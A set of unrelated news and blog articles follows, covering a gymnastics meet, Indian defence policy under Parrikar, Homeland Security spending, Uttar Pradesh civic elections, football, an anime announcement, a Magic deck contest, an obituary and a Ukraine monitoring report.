As it looks, the sixth German to be added will be extraneous. If they go with Seitz, they'll have possible insurance on bars, but if they go with Griesser, they'll have a utility player on the two events with which they need the most help. Seitz is older and more experienced, Griesser is younger but won't get the experience she needs for the future if they don't use her here. It's a much more difficult decision than I thought it'd be, though I think at this point I'd go with Griesser if only so Seitz can have some time off to recover rather than putting unneeded stress on her body when she won't even contribute much more than they already have.
The rest of their team looks to be doing well, even if Scheder had a rough day. Bui and Schäfer were neck-in-neck in the all-around, with Schäfer edging out the German national champion by two tenths to secure the bronze all-around medal. Hill put up a gorgeous FTY, a solid beam set, and a rock star bars routine, winning the title on that event. Had she competed on floor, she would have been right up there with Schäfer and Bui. It's a very good team, and with the addition of Akyol for Worlds should compete very well in Nanning.
Host team Switzerland came in third here, as expected. Giulia Steingruber took the silver all-around medal with clean and steady performances across all events. Ilaria Käslin proved what a great help she will be on bars and beam, events on which Caterina Barloggio also showed to compete well, if not coming in with the highest difficulty.
Overall, the Länderkampf Kunstturnen meet offered a nice glimpse at what we should expect from these three teams at World Championships. Romania will want to spend the next few weeks really trying to build consistency among their younger athletes, if only because right now Iordache is the glue holding that team together. If something happens with an injury or falls in qualifications, this team will be lucky to make it into the team final. It's looking that bleak.
All-Around Results
Rank Athlete Nation VT UB BB FX AA 1 Larisa Iordache Romania 14.800 14.450 15.100 14.600 58.950 2 Giulia Steingruber Switzerland 14.450 13.900 14.250 14.100 56.700 3 Pauline Schäfer Germany 14.400 13.050 14.250 13.900 55.600 4 Kim Bui Germany 13.750 14.600 12.600 14.450 55.400 5 Stefania Stanila Romania 13.600 12.950 13.600 14.000 54.150 6 Sophie Scheder Germany 13.800 14.150 13.050 11.750 52.750 7 Stefanie Siegenthaler Switzerland 12.800 12.900 12.950 11.700 50.350 8 Lisa Katharina Hill Germany 14.150 14.650 13.400 —— 42.200 9 Ana Maria Ocolisan Romania 14.600 12.400 13.200 —— 40.200 10 Laura Schulte Switzerland 13.900 12.250 —— 12.550 38.700 11 Caterina Barloggio Switzerland —— 12.900 13.200 12.250 38.350 12 Nicole Hitz Switzerland 13.050 —— 12.650 12.050 37.750 13 Paula Tudorache Romania —— 10.200 12.350 13.250 35.800 14 Andreea Munteanu Romania —— —— 14.450 13.900 28.350 15 Silvia Zarzu Romania 13.750 —— —— 13.450 27.200 16 Ilaria Käslin Switzerland —— 13.300 13.850 —— 27.150 17 Leah Griesser Germany —— —— 11.450 13.150 24.600 18 Elisabeth Seitz Germany —— 13.950 —— —— 13.950
Team Results
Rank Nation Total 1 Germany 220.000 2 Romania 219.050 3 Switzerland 212.400
Article by Lauren Hopkins
Photo thanks to Deutscher Turner-Bund
Advertisements
EDITOR'S NOTE
In a span of 28 months Manohar Parrikar had developed easy relationships with the top brass of the three services; as has rarely ever been witnessed. He threw caution to the winds and managed to pull the forces out of a downward spiral in operational capabilities. Surprisingly, even as the MoD cleared a total of 124 new contracts worth Rs 2,09,751 crores since the Modi government came to power, not a single case of graft has come to light. However, the unfinished agenda after years of sloth yet remains a massive challenge. Nitin A Gokhale, Founder -BharatShakti.in takes stock of what the Minister achieved and the challenges that will dog his successor.
PARRIKAR'S WILL BE A HARD ACT TO FOLLOW
Now that Manohar Parrikar's return to Goa is done and dusted, the immediate priority for Prime Minister Modi will be to find an equally hardworking, transparent and approachable Raksha Mantri for India. Though Arun Jaitley, the perennial ‘go-to' man has been given the additional charge of the Ministry of Defence, surely he can't be expected to handle two large and critical ministries simultaneously.
However, whosoever is the new occupant in South Block in the coming months will find it a hard act to follow since Parrikar, in his 28 month stint, had brought in a new sense of vigour and purpose in the largely moribund MoD.
Before Parrikar took over as Defence minister, he had been variously described to me as a reluctant politician, an even more reluctant minister at the Centre and an outsider in the power corridors of Delhi. To my mind however, after getting acquainted with him over the past two-and-a-half years, Parrikar can be best described as a simple man who is not a simpleton; a man of frugal habits who shunned all visible trappings of power and was quick to understand complex issues.
Those attributes not only allowed him to grasp the intricacies and complexities of the important ministry but also enabled him to put his own stamp on the day-to-day functioning of the MoD. There have been slip-ups and some embarrassments too, because well-entrenched vested interests tried to undermine his authority.
I remember meeting him for the first time in February 2015 (before that, had only heard about Parrikar as an unusual politician). One of the questions he had was: “What in your view is the biggest challenge here?”
At first, because of unfamiliarity with him, I had thought of playing safe and gave a standard reply that, “it's a large, sensitive and important ministry and therefore not easy to understand quickly.”
But his easy manner encouraged me to be bolder and remark: “Your greatest challenge will be the status quo mindset that pervades through the civil and military bureaucracy. Everyone will tell you that such and such thing cannot be done because there has been no precedence to it. If you can overcome that trend, maybe you would have made a big start.”
I can't judge if Parrikar took that input (not advice) seriously but whoever I came across since then – whether in the services or in the defence industry – swore by Parrikar's efforts to re-engerise the MoD and bring in more accountability.
This in itself is a big change because at the best of times, the MoD is a lumbering giant, slow to stir and act. It is not only entrusted with the defence of India but is also the administrative ministry for India's nearly 15 lakh military personnel (Army, Navy, Air Force and Coast Guard). It also has one of the largest budgets in the government of India. For 2017-18, for instance, it has been allocated Rs. 3,59,854 crore (US$ 53.5 billion). Critics have quibbled over the comparatively low increase in the defence budget this year. But that is the least of the challenges.
Instead, reducing timelines for acquisitions, better and optimum utilisation of available resources, bringing in more accountability and transparency in MoD's functioning and making sure most critical voids in India's defence preparedness are made up in quick time, have been the focus areas in South Block. But above all, the MoD under Parrikar saw to it that the Make in India initiative of the Prime Minister gets the necessary impetus in defence production.
Promulgation of Defence of Procurement Policy (DPP)-2016 was the first step towards making fundamental changes in the way weapons platforms are acquired in India. The Buy IDDM (Indigenously Designed, Developed and Manufactured) category introduced in DPP-2016 now gets the topmost priority amongst six categories that constitute the new DPP, which is the guiding document for all defence purchases in India. In effect, this means all those Indian companies who have the capability of designing and developing their products indigenously will from now on get the first preference in most purchases that the three armed forces undertake.
Under the new category for Indigenously Designed, Developed and Manufactured (IDDM) equipment, it will be mandatory for 40 per cent of the content to be sourced locally.
The new DPP has many fresh ideas designed to accelerate defence acquisitions while encouraging indigenous companies under the flagship programme of Make in India. For instance, in order to cut down delays, the DPP henceforth mandates that all AONs (Acceptance of Necessity) of a particular platform will be valid only for only six months as against the 12 months deadline that it currently provides. Moreover, no AON will be notified until it is accompanied by a finalised RFP (Request for Proposal or detailed tender). In essence, this eliminates one intermediate stage since notifying an RFP after an AON used to be inordinately delayed.
Prioritisation of projects was the first step. Defence acquisitions are expensive and since very little was purchased in the past five years, the backlog just added to the problem. A review of proposed projects made over the previous five years found that the bureaucracy in the ministry — both civil and military — were sitting on some 400-odd big and small projects that were critical to the three armed forces. A thorough review revealed that nearly one-third of the 400-odd projects were now irrelevant. So they were discarded. About 50 projects were accelerated since they were of critical importance.
Next, important schemes across the three services that needed immediate funding and implementation were identified. The figures speak for themselves: The MoD cleared a total of 124 new contracts worth Rs 2,09,751 crores since the Modi government came to power. These include artillery guns, attack and medium lift helicopters for the Army (Chinook and Apache helicopters from the US); frigates and mine counter-measure vessels for the Navy and Akash missiles for the Air Force.
Post-September 2016, when India conducted surgical strikes against Pakistan and it seemed for a while that Pakistan may mobilise for a larger conflict, India's Cabinet Committee on Security (CCS) authorised the three forces to make fast-track acquisitions worth nearly Rs 20,000 crores making it one of the most productive years for the MoD.
This had to be done on priority because the previous government had neglected even the basic requirements. The previous Comptroller and Auditor General (CAG) Report tabled in Parliament made for grim reading. “Stocking of ammunition even at ‘minimum acceptable risk level' was not ensured, as availability of ammunition as on March 2013 was below this level in respect of 125 out of a total of 170 types of ammunition.” Also, in 50 per cent of the total types of ammunition, the holding was “critical” — insufficient for even 10 days of fighting, the report added.
This has now been corrected by making sure that ammunition for 10 days of intense fighting is always in stock. Once that objective is achieved, the ministry will look at further replenishing the stocks. The delegated financial powers for Vice Chiefs of the three services and Army Commanders has been enhanced to allow speedier purchases. This is a big change in the notoriously slow and opaque functioning that has historically besieged the MoD.
In another major decision, the Government opened up the defence sector for FDI, allowing 49 percent FDI through the automatic route and up to 100 percent FDI on a case to case basis. Also, the restrictions on what was ‘state-of-the-art technology' has been reduced to ‘modern technology'. This would increase the number of defence companies investing in India.
Procurement and modernisation of three services apart, the biggest decision by the Modi government was to grant the One Rank One pension—a 40 year old demand of the veterans. Although there have been some voices of disgruntlement on the issue, the fact is, this government showed the necessary political will and resolve to give due dignity to military veterans.
Significantly, MoD has now allowed authorised, registered agents to represent companies and eliminate delays or cancellation of contracts because of anonymous complaints. Anonymous letters are now a no-go. The Ministry wants to use the power to ban a firm only in the rarest case. The previous government had indiscriminately blacklisted over a dozen firms, severely restricting the options of the forces to source equipment.
Despite Parrikar's efficiency and good intentions, a toxic legacy left behind by a decade and more of lethargy and timidity under AK Antony will take sustained efforts by Parrikar's successor to ensure that the MoD effectively discharges its duties towards securing the nation.
Half done initiatives like choosing the strategic partners for making defence platforms in India, reforming higher defence management (appointing a CDS—even if 4-star), creating joint commands for space, cyber and special operations will have to be followed by Parrikar's successor. It's for PM Modi to choose the right man—or woman—to do that, and do it fast.
Nitin A. Gokhale
(Disclaimer: The views and opinions expressed in this article are those of the author and do not necessarily reflect the official policy or position of BharatShakti.in)
Worse is the lack of outrage this inspires. For all the talk of reducing government waste, Homeland Security spending is almost never discussed, as if the fact that everyone agrees it's an appropriate government function makes the agency responsible for it impervious to inefficiency or badly distributed resources.
This is especially galling given that waste already reported in the press -- almost certainly a small subset of actual waste -- is sufficient to conclude that many of our homeland security efforts are a joke.
Earlier this month, it was Ohio law enforcement officials who "mishandled nearly $5 million in federal anti-terrorism grants." Isn't it good to know that we sent several Ohioans to Turkey "to learn about terrorism"?
Or consider the state of New Jersey. A think tank there may have squandered as much as $3 million. Newspaper columnist Mike Kelly reports that elsewhere in the Garden State, Newark officials spent $300,000 on air-conditioning for garbage trucks "to protect drivers during a chemical bomb attack." And in Bergen County, the local prosecutor maintains an airplane as a "Homeland Security resource." Officials also spent $98,000 on stretchers "to carry victims of mass killings."
Since 2003, Idaho has gotten more than $100 million in terrorism funds, according to an article that also notes that a very small percentage has been wasted on outright fraud. But does it make sense to allocate any of that money to a rural state where the likelihood of any terrorist attack is minute?
The most frustrating thing about examples like these -- and there are many more spreads across the nation -- is that they're still going on under the Obama administration, even though the folly of it all was pointed out time and again under the last administration (whose secretary of Homeland Security is now shilling for naked body scanners). Alas, we've continued to squander funds on questionable purchases and disperse money to various jurisdictions that don't need it.
And we're poised to do so again:
...the Obama Administration released its proposed 3.8 trillion FY 2011 budget of which roughly $4 billion is slated for state and local homeland security grants and programs. What is obvious from the start is how little the Administration proposes to cut from these state and local programs. Many expected deep cuts given the huge $1.6 trillion federal deficit projected for FY 2011.
The obvious remedy is to subject Homeland Security spending to extra scrutiny, rather than treating outlays rhetorically associated with the war on terrorism as if they're somehow beyond question. It's also vital that we develop a national strategy for allocating these funds in the most efficient way possible.
I submit that the American people ought to draw a larger conclusion too. The stories linked above and others like them prove that officials at every level of our government are willing to exploit the issue of terrorism to enhance their own budgets or reputations, even in cases when the extra spending has little to do with making us safer. Shouldn't that knowledge make us more skeptical when the people in charge insist that they need more power to tap our phones, monitor our Internet usage, or intrusively pat us down at airports? For too long in America, "it's necessary to prevail in the War on Terror" has been an explanation afforded deference. Given the many ways it has been abused, officials who offer that rationale and nothing more ought to be marginally less trusted.
Thanks to Sally Laukner for helping me to research this post.
Image credit: Jason Reid/Reuters
The party has been able to win one seat of Nagar Panchayat chairman, two municipal corporation corporators, 8 Nagar Panchayat member seats.
Arvind Kejriwal-led Aam Aadmi Party has opened its account in Uttar Pradesh Civic Elections 2017. AAP, which contested polls in a number of wards, has reportedly won at least 10 seats. The party has been able to win one seat of Nagar Panchayat chairman, two municipal corporation corporators, 8 Nagar Panchayat member seats. In Bundelkhand region, AAP's Munni Devi won Nagar Palika chairman elections from Tindvari. While party's Sudhir Dhama won a seat in Kherka Nagar Pallika, Baghpat. One AAP candidate has been able to win a seat in Rae Bareli. In Hapur, party's Meena Parveen has won elections on Peera Babadin (ward 41). Earlier, the party had decided not to contest elections in the state in 2016. In 2014, Kejriwal's party had suffered a drubbing in the state, and the victory this time comes as good news for the party.
Bhartiya Janata Party has emerged as the clear winner in the elections. The party has won 14 of the 16 mayoral seats in the state. In the remaining two places, the Mayawati's BSP was reported leading. As per available inputs, the BJP candidates were dominating the leads in seats including Lucknow, Allahabad, Aligarh, Varanasi, Ghaziabad, Gorakhpur, Faizabad and Moradabad municipal corporations while the BSP was ahead in Jhansi and Agra municipal corporations.
In another highlight of the elections, Rahul Gandhi suffered a setback as the party lost the elections in his bastion of Amethi. Amethi's victory becomes significant for BJP as it comes ahead of Gandhi's coronation as party president. A report says that BJP's Chandrama Devi won the elections from here by over 1035 votes. Earlier too, Congress has suffered poll losses here. In February, the grand old party had lost all four Assembly seats in the constituency – Amethi, Tiloi, Jagdishpur, Gauriganj, and Salon. The civic polls have come as yet another setback for Congress as they have failed to put up a good show in the elections.
Phil Jones has denied that Manchester United's squad stopped playing for former manager David Moyes.
Moyes was sacked on Tuesday after United's hopes of claiming a Champions League place were ended by a defeat at Everton the previous Sunday.
"Players don't go out on the football pitch to lose games," said Jones, after Saturday's 4-0 win over Norwich.
"We are sorry he has lost his job and we didn't get some of the results we would have liked to for him."
The defeat at Everton ensured United are resigned to missing out on Champions League qualification for the first time since 1995.
Unless they can climb from their present seventh place, they will not even claim a place in next season's Europa League.
Man Utd's disappointing season under David Moyes Defeated in Champions League quarter-final by Bayern Munich
Beaten in League Cup semi-final by Sunderland
Lost at home to Swansea in the third round of the FA Cup
Five points from a possible 24 against the current Premier League top four of Liverpool, Chelsea, Manchester City and Arsenal
Defeat against Everton confirmed club will miss out on Champions League for first time since 1995-96
Moyes was criticised for his work in the transfer market and a perceived negative style of play.
But England defender Jones, 22, said he had sympathy at Moyes losing his job only nine months into a six-year contract.
"He is a nice man, a nice fella and we wish him all the best," he said.
Asked whether the players stopped trying for Moyes, Jones insisted: "Everyone wants to win every game at this club.
"It's not happened for whatever reason but we need to move on quickly and end the season well."
Former Birmingham and Aston Villa manager Alex McLeish believes the pay-off negotiated between the League Managers Association and United would provide little consolation to Moyes.
"Myself and David Moyes, we are driven people and we want to work," said McLeish.
"You look at your own personal situation and you want to get back - it's nothing to do with the money, you want to get back in the dug-out."
After being released by Ipswich Town late last year, having not even played a game for the Championship club, Sean St Ledger decided to try his luck in the United States, the land of opportunity.
In the nine months the Republic of Ireland defender has been in the US, he has met Taylor Swift (sparking an internet sensation), played with Kaka, played against David Villa and Andrea Pirlo and hung out with the likes of Paolo Maldini.
Opportunities, he concedes, would never (ever, ever...) have experienced had he not moved to the States.
As St Ledger readily admits, his time in Major League Soccer has been "up and down", having failed to impress during a trial with DC United and prematurely left Orlando City in controversial circumstances.
But the 30-year-old is now happily settled at Colorado Rapids, where he is reunited with Republic of Ireland team-mate Kevin Doyle, and his arrival has helped inspire an upturn in fortunes.
The Rapids have won their last three matches and St Ledger and Doyle have combined to great effect, teaming up for the game winner against Houston Dynamo last Wednesday.
"The goal was made in Ireland," St Ledger told The Telegraph in an interview. "I don't we had ever combined for a goal before - we've linked up well in training with passes. It seems like we're on the same wavelength.
"Being in the Ireland squad I know what Kev is all about and one of his strengths is his heading. It was 1-1 and late in the game and I found myself on the right-hand side in space so I started to push forward - something I used to do when I was a bit younger and probably more able to do it!
"The winger played it to me and luckily I got it before it went out of play and I think a few of their players stopped. I thought as long as I can keep the ball in, I knew there would be half a chance Kev could get on the end of it.
"I knew from playing against Kev many times that if there was a 50-50 he would get on the end of it and I didn't even see the ball go in the net as I fell over the advertising board!"
GOOOOOOOOOOOOOOALLLL!! What a header from #DoyleRules. Stooping in to convert St.Ledger's cut back. (78) 2-1 #COLvHOU pic.twitter.com/7hJ562957L — Colorado Rapids (@ColoradoRapids) August 27, 2015
The duo had a brief reunion when Orlando City played Colorado Rapids earlier in the MLS season and St Ledger admits having a friendly face around has helped him settle at his new club.
"When you join a new club there's always that first day of school moment when you say, 'Hello, I'm Sean' so it was great I had someone to talk to."
St Ledger has fond memories of his time at Orlando and while he admits he was somewhat fortunate to land a contract at the expansion club, he says the key for European players to make it in MLS is simply to come to the States and try to "get into the system".
"It's been up and down," St Ledger says of his time in MLS. "I went on trial with DC United in Florida for two weeks. I thought I did pretty well and obviously they said I wouldn't get a contract there and would have been fourth choice centre-back.
"But then we played Orlando in a pre-season friendly there and [it helped me] with the manager [Adrian Heath] being English and I knew Lewis Neal from my time at Preston. And as it happened Orlando had a centre-half going back to Brazil so I had an opportunity to go there.
"Before I came here I was told that I just needed to come to the States and try to get into the system. I couldn't get a permanent contract anywhere and needed to come on trial.
"I think people from England have found it hard just to come over here as there's so many players who want to come over here. MLS has such a wide selection of players and now it is not as easy as it was a few years ago."
St. Ledger put it all on the line to make an incredible save in last night's match. Read: http://t.co/zSp5mGggCd pic.twitter.com/A4LC4mkgLh — Orlando City SC (@OrlandoCitySC) July 1, 2015
The biggest highlight for St Ledger at Orlando - besides the glorious weather ("I don't think I owned a jumper") - was playing with former AC Milan and Real Madrid legend Kaka and sitting next to him in the dressing room.
"When I first walked into the changing room, the only spare locker was the one next to him [Kaka]," St Ledger recalls. "He grew up in my era and we played Brazil at the Emirates with Ireland and he was one of the first names you look at.
"Never ever in my wildest dreams did I think I would be on the same team as him because of the standard of player he is - and the standard I am. We're world's apart really.
How things can change! I bet Sean St Ledger never thought he'd get a chance to play with Kaka! #coybig #orlandocityfc pic.twitter.com/Sb4K4NqbGx — Dave O'Grady (@DaveOGrady1) February 8, 2015
"The thing that struck me the most about him is how humble and down to earth he is. We got talking as I was next to him and I told him that his English was really good. And he said that he learned English in Milan from a guy from Leicester - and I used to play for Leicester so that was weird.
"On a Friday he would stay and take free-kicks after training at it was the best I've ever seen. He'd put the mannequins up and strike the ball into the top corner 8/9 times out of 10. It was like nothing to him.
"Playing with one of the world's greatest players - that memory will always stay with me."
As well as playing with Kaka, St Ledger has relished playing against the likes of Villa and Pirlo. But the centre-back says he was not able to swap shirts with the MLS superstars for a surprising reason.
"You only get a certain number of shirts in MLS and with Orlando they were running out of shirts because they printed so many replica Kaka jerseys.
"So the manager said you can't give any shirts away so if you wanted one you basically had to pay for it. Also we lost 5-3 so you don't think it's the right thing to do - trade shirts."
During his time in Orlando, St Ledger went to Universal Studios but never made it to Disney World.
"It was on my list of things to do and I thought, 'I'm here for a year I've got plenty of time'," he says a little ruefully.
"I was at Universal with my girlfriend and I'd not been at Orlando long and some kids came up to me and asked if I played for the team. That surprised me."
If playing with and against superstars wasn't enough, St Ledger's biggest moment during his time in the United States, perhaps, came during a chance - and brief - meeting with Taylor Swift on New Year's Eve and his subsequent tweet that soon went viral.
A full internet explosion then happened when St Ledger gave an interview to an Irish TV station and some of his saracstic answers were taken seriously.
"I didn't have a club at the time and I was on vacation in New York which is one of my favourite cities in the world. It was my 30th birthday - it's on Dec 28 and I've never celebrated it as there's always a game in England on that day," St Ledger said.
"I was with my girlfriend and we knew a few people there and went to Taylor Swift's aftershow for her New Year's Eve bash.
"We ended up talking and had a picture taken. We got chatting for five minutes and she was really down to earth - and that was it."
He added: "I did an interview with an Irish TV station and they were asking me about Taylor Swift and let's be realistic here.... It was a stupid question and I was answering questions sarcastically.
"And they asked if she was coming to Orlando, and I said, 'Well I don't think she's coming down there but she might come to the game in New York.'
"And they released that but not when I said she already had a boyfriend. The power of social media."
The anime studio Madhouse is producing a television anime adaptation of Junya Inoue's Btooom! manga. The story centers around Ryūta Sakamoto, a NEET (Not in Education, Employment, or Training) young man and a top-ranked player in the online combat game Btooom! One day, he wakes up on a tropical island without remembering how he got there. He sees a figure in the distance and asks for help. However, the figure responds by throwing something at Ryūta — a "BIM" bomb. In that moment, Ryūta comes to realize two things: one, his own life is in danger, and two, he is now in the world of Btooom!
First-time series director Kotono Watanabe (episode director on Chihayafuru, Aoi Bungaku Series, Puella Magi Madoka Magica) is helming the project, and Yousuke KURODA (Best Student Council, Hayate the Combat Butler!!, Hellsing, High School of the Dead, Mobile Suit Gundam 00) is writing the scripts. In addition to creating Btoom! , Inoue also created the Otogi Matsuri manga.
[Via earl.box]
Update: The domain name btooom.com has been registered under the name of Flying Dog, the anime music label of Victor Entertainment (JVC Music).
The manga launched in Shinchosha's Weekly Comic Bunch magazine in 2009 and then moved to its current home, Monthly Comic Bunch , in 2011. Shinchosha is publishing the eighth compiled book volume this month.
Update: The official website launched a preview page, confirming that the character designer is Takahiro Kishida (Baccano!, Durarara!!, Puella Magi Madoka Magica).
Big Ten Football Media Days got underway on Thursday with seven of the conference's 14 head coaches speaking to the press en masse for the first time since last season. Penn State and James Franklin will speak Friday morning at 10:30 a.m., and while he'll be asked about many storylines entering the 2015 season, one of the most recent is how he's holding a press conference in Chicago after throwing the first pitch at the Phillies game Thursday night.
Thursday's event featured the head coaches of Illinois, Michigan State, Maryland, Wisconsin, Indiana, Iowa, and Ohio State. Each coach was allotted 15 minutes in front of the media room, with time for miscellaneous interviews before and after. Most of the coaches used their time to talk about their programs, but one branched off to talk about his program's perceived the biggest rival.
When Maryland's head coach, Randy Edsall, was asked about who he considered the Terps' rival to be, he answered, “Well it's Penn State now.”
Maryland's first meeting with Penn State as a member of the Big Ten went in the former's favor, as the Terrapins won a frustrating 20-19 affair. The longest lasting impresson came before the game, though — after a pregame scuffle, Maryland players snubbed Penn State's captains at the handshake line. While Edsall and Maryland's athletic director issued apologies after the game, it was an interesting way to start the teams' first B1G matchup.
Who Penn State's rival is has been a popular subject of discussion this summer. We talked about it in our podcast and Black Shoes Diaries took a mathematical approach, but we both came up with the same lists — either Michigan, Michigan State, Ohio State, Pitt, or even Rutgers, but likely not Maryland. That being said, Edsall's logic was sound — rivalries begin in recruiting, and Penn State has been a popular pick for recruits from the Old Line State.
“Well, I think the one thing [about recruiting] is in terms of any time that you beat teams from your area or if you beat a team that you haven't had really particular success against — when you're 1-35-1 against a program that you played consistently, you know, through the '60s, the '70s, the '80s and those eras, to be able to go and beat them in Happy Valley for the first time and the first time you've ever beaten them there and also the first time since 1961, I think it showed kids in our area that we can compete with them and we can win. And I think kids look at that. High school kids look at that,” Edsall said.
“And Penn State has always had a niche for being able to come down to Maryland and take players up there,” he added. “And that's one of the things that we knew if we wanted to get some recruits, we'd have to beat them on the field.”
Depending on who you ask, last year's display was either the beginning of a heated rivalry or the first of an annual dirty game. Either way, one thing is certain — when you're 2-35-1 against a program and refuse pregame gestures of good sportsmanship, you'll certainly get the Lions' attention.
The two teams will meet up at MT&T Bank Stadium on Oct. 24 to settle whether or not last year was a fluke or a sign of things to come.
Your ad blocker is on. Please choose an option below.
Sign Up for our e-mail newsletter: OR Support quality journalism:
About the Author
Doug Leeson Doug is a sophomore and Onward State's Assistant Managing Editor. Dislikes: popcorn, Rutgers, and a low #TimberCount. Likes: "Frozen," Rec Hall, and you. Contact him via email at [email protected] or on Twitter @DougLeeson.
East Renovation Continues With Approval For Sproul, Geary Halls Penn State's Board of Trustees approved the next phase of East Halls renovations at its meeting Friday, setting the stage for construction to begin on Sproul and Geary Halls.
Submit your deck here and nowhere else: http://mtgolibrary.blogspot.se/2015/11/the-pauper-gauntlet.html.
To get into spirit, lets listen to the Pauper Gauntlet Song
Lyrics by Dan, vocals by keixoun, music by Europe. If you want to hear more from the talented keixioun, check out his SoundCloud page.
Please do not submit decks here – you have to submit them in the comments to the article linked at the very top of this one.
Sponsors
The main sponsor of season three of the Pauper Gauntlet is mtgotickets.com.
As a special offer, mtgotickets is selling 10 tickets for 8 dollars. Please visit them and show them that it was a good idea to sponsor the Pauper Gauntlet. Use this link: I love the Pauper Gauntlet
Another sponsor is mtgolibrary.com. That is why we are running deck submission there instead of here.
Other important sponsors of the Pauper Gauntlet are you, the patrons of MagicGatheringStrat. If you enjoy the Pauper Gauntlet consider becoming a patron of MagicGatheringStrat at https://www.patreon.com/magicgatheringstrat.
The Pauper Gauntlet season four is already one of the Patreon milestone goals. If we can reach that goal season four starts in November 2016.
Submit your deck at mtgolibrary.blogspot.com
Remember!
* A web page with the deck list
* A sideboard plan
* Hints for Dan
The 15 prequalified decks
The top 10 decks of last year and the top 4 decks + the people's choice from the Pauper Rogue Cup are already qualified for season three of the Pauper Gauntlet.
This is the status of those decks.
If I can not find a captain or get no new deck list for the top 10 decks I will run with the lists that played last year. Apparently those lists did something right.
Affinity: Needs a captain. Default list: http://mtgolibrary.blogspot.se/2013/11/the-top-decks-of-pauper-affinity.html
Bugs & Pigs: Waiting for Galactic President. http://tappedout.net/mtg-decks/bugs-pigs/
Burn: Needs a captain. Default list: http://mtgolibrary.blogspot.se/2013/11/the-top-decks-of-pauper-burn.html
Exhume Control: David could not make it. rrmedio1 will captain the deck. Default list: http://magicgatheringstrat.com/2014/07/exhume-and-crush-a-primer/
Familiars: Waiting for Riccardo. http://archive.wizards.com/Magic/Digital/MagicOnlineTourn.aspx?x=mtg/digital/magiconline/tourn/6767329
Goblins: Needs a captain. Jason, it is your list – do you want to do it?
The Green One: Deluxeicoff. Ready to rumble. http://mtgolibrary.blogspot.se/2015/09/pauper-gauntlet-competitor-1-green-one.html
Mono Red Heroic: Waiting for jphsnake. Default list: http://tappedout.net/mtg-decks/23-10-14-only-one/
Rebel Grind: Waiting for Aught3. Default list: https://deckbox.org/sets/751913
Stompy: Captained by Carnuz. Waiting for list. Default list: http://magicgatheringstrat.com/2014/07/pauper-gauntlet-competitor-13-stompy/
If you want to be the captain of any of these decks, just submit a deck like a normal deck submission to the Pauper Gauntlet. If you have any results or accolades with the deck please state them as well (such as having a great 2-man record or 3-0:ing a Daily Event).
Captains and brewers! Links to new lists for these things must be posted in the comments to the mtgolibrary.blogspot.com Pauper Gauntlet article BEFORE November 18th, 9 AM GMT+1.
Here they are, the links to the official pages for the five contenders raised from our Rogue Cup:
Black Auramancer: https://cardboardcommons.wordpress.com/pauper-rogue-cup-2015/gauntlet-deck-black-auramancer-by-santi-postigo/
Pestilence Control: https://cardboardcommons.wordpress.com/pauper-rogue-cup-2015/gauntlet-deck-pestilence-control-by-felix-lorente/
Izzet Kuldotha: https://cardboardcommons.wordpress.com/pauper-rogue-cup-2015/gauntlet-deck-izzet-kuldotha-by-hashnak/
Red Land Destruction: https://cardboardcommons.wordpress.com/pauper-rogue-cup-2015/gauntlet-deck-red-land-destruction-by-juan-fernandez/
Rakdos Vampires: https://cardboardcommons.wordpress.com/pauper-rogue-cup-2015/gauntlet-deck-rakdos-vampires-by-domingo-moreno/
Rules
I have tried to summarize the rules in the mtgolibrary article. They are also in this video.
Finally a shoutout to Cardboard Commons and PauperMage for all the work with the Pauper Rogue Cup! Thank you so much!
If any other Pauper related website wants to run qualification tournaments for the Pauper Gauntlet season four please get into touch with me in March (right now I will be way too busy managing this thing).
And remember to check out our sponsor: mtgotickets.com.
Photo: CB Forgotston
By Dayne Sherman
Charlton Bath Forgotston, Jr. has died. It is difficult to put into words how saddened I am by CB's passing. He was sui generis: “of its (his, her, or their) own kind; in a class by itself.”
Many will know CB from his newspaper columns and radio appearances. He was an expert on the 1974 Louisiana State Constitution, which he helped pilot through the Legislature while he was a young lawyer working at the Capitol.
As technology changed, CB adopted the blog format and Twitter, which he used regularly to communicate with his many fans, as well as to horsewhip Louisiana politicians, both Democrats and Republicans alike.
Veteran Louisiana columnist James Gill called CB the “King of Subversive Bloggers,” which CB used as a trademark.
Indeed, his “Louisiana Misery Index” was a work of political subversion par excellence. It recorded every good list Louisiana was last on and every bad list we were at the top of.
No matter the politician or government policy, CB distrusted both the messenger and the action. He was cynical and usually right, as fellow blogger and LSU professor Bob Mann says of CB's passing.
After Hurricane Katrina, CB came to live in my native Tangipahoa Parish and my hometown of Hammond. The truth is, I was proud that he moved to town.
I was one of CB's fans. He always answered my questions about politics and policy. He served as a huge resource and an inspiration as I fought Bobby Jindal over the years.
Selfishly, I figured if Gov. Jindal decided to put out a hit on his detractors, CB would be the first to go. Until such time, I had nothing to worry about.
CB recently responded to one of my Twitter diatribes on December 12, 2015. It was his final tweet published:
It's a miracle he fooled so many people in La. into believing his “Louisiana Miracle.” https://t.co/vTDQFSUWG2 — C.B. Forgotston (@CBForgot) December 12, 2015
The man lived his life with the (hammer) of truth in his hand. In a state and a world dedicated to untruth, it has been a joy to know CB Forgotston. I will miss him, and I send his widow EJ my deepest condolences.
Rest in peace, CB. We'll try our best to swing the hammer in your absence.
–Dayne Sherman is the author of the novels Zion and Welcome to the Fallen Paradise, both $2.99 ebooks. Signed first editions are available from the author. And he does not speak for any of his employers.
///////////////////////////
Dayne Sherman, Writer & Speaker Facebook: https://www.facebook.com/TalkAboutTheSouth Tweet the South: Twitter: http://twitter.com/TweettheSouth/
Comments
comments
In Donetsk and Luhansk the situation remained volatile. Other parts of Ukraine remained calm.
The situation in Kharkiv remained calm.
In Luhansk region the situation remained volatile. The SMM was informed about the abduction of a school teacher by unknown uniformed armed men on 14 May. Reportedly, the teacher was abducted in the office in the presence of pupils and teachers and taken into a car and allegedly held at the SBU building which is occupied by “South Eastern Army”. The teacher was released after two hours.
In Donetsk the situation remained tense. After a re-assessment of the security situation, the SMM visited the city of Sloviansk (120 kilometres north of Donetsk). The SMM met high-level representatives of the Ukrainian Orthodox Church (Moscow Patriarchate). The self-declared mayor, Ponomaryov, was also present at the meeting. The Church representatives suggested that the end of all violence can lead to a dialogue between Ukrainian authorities and those opposing the Government. The self-declared mayor, Ponomaryov, informed SMM that there were two preconditions to start negotiations: Firstly, withdrawal of all military forces from Donetsk, Luhansk and Kharkiv regions and secondly, mutual release of all detainees. According to him at present there are 40 detainees[i] in Sloviansk. The self-declared mayor also made reference to a draft of the “Constitution of Donetsk People's Republic”. In the SMM's presence, Irma Krat (a journalist who has been detained since April by Ponomaryov' forces) was allowed to call her husband.
